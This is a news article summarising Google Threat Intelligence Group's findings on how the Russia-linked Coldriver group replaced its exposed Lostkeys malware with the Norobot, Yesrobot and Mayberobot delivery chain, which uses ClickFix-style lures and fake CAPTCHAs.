A Russia-linked threat actor tracked as Coldriver (UNC4057, Star Blizzard, and Callisto) has been increasingly using a new malware family after its Lostkeys malware was exposed in May 2025.
According to a new analysis from Google’s Threat Intelligence Group (GTIG), the group moved quickly to refine and retool its arsenal just five days after public disclosure shifting to a related delivery chain that Google has codenamed Norobot, Yesrobot and Mayberobot.
The attack begins with an HTML ClickFix-style lure dubbed Coldcopy that drops a DLL named Norobot and executes it via rundll32.exe. Early versions briefly deployed a Python backdoor called Yesrobot, which uses HTTPS to fetch commands and can download files and harvest documents. Only two Yesrobot infections were observed over a two-week span in late May, GTIG said.
Researchers believe that Yesrobot was likely a quick “stopgap mechanism” after Lostkeys became public, before threat actors implemented a more capable PowerShell implant called Mayrobot. The PowerShell-based family can download and run payloads from URLs, execute commands through cmd.exe and run arbitrary PowerShell code. Zscaler ThreatLabz released a report last month describing Coldriver’s tactics and the Norobot and Mayberobot implants, which it tracks as ‘Baitswitch’ and ‘Simplefix,’ respectively.
Google says that an early Norobot variant installed a full Python 3.8 runtime on compromised hosts, a noisy artifact the actors later removed as they refined the chain. GTIG also noted the group has alternated between simplifying the delivery to increase success rates and more complex methods such as splitting cryptographic keys to evade detection.
Unlike Coldriver’s previous focus on high-profile NGOs, policy advisors and dissidents for credential theft, the latest waves use ClickFix-style prompts and a fake CAPTCHA that tricks targets into running malicious PowerShell through the Windows Run dialog. Google said Norobot and Mayberobot are likely used for high-value targets who may already have been phished, for deeper intelligence collection from compromised devices.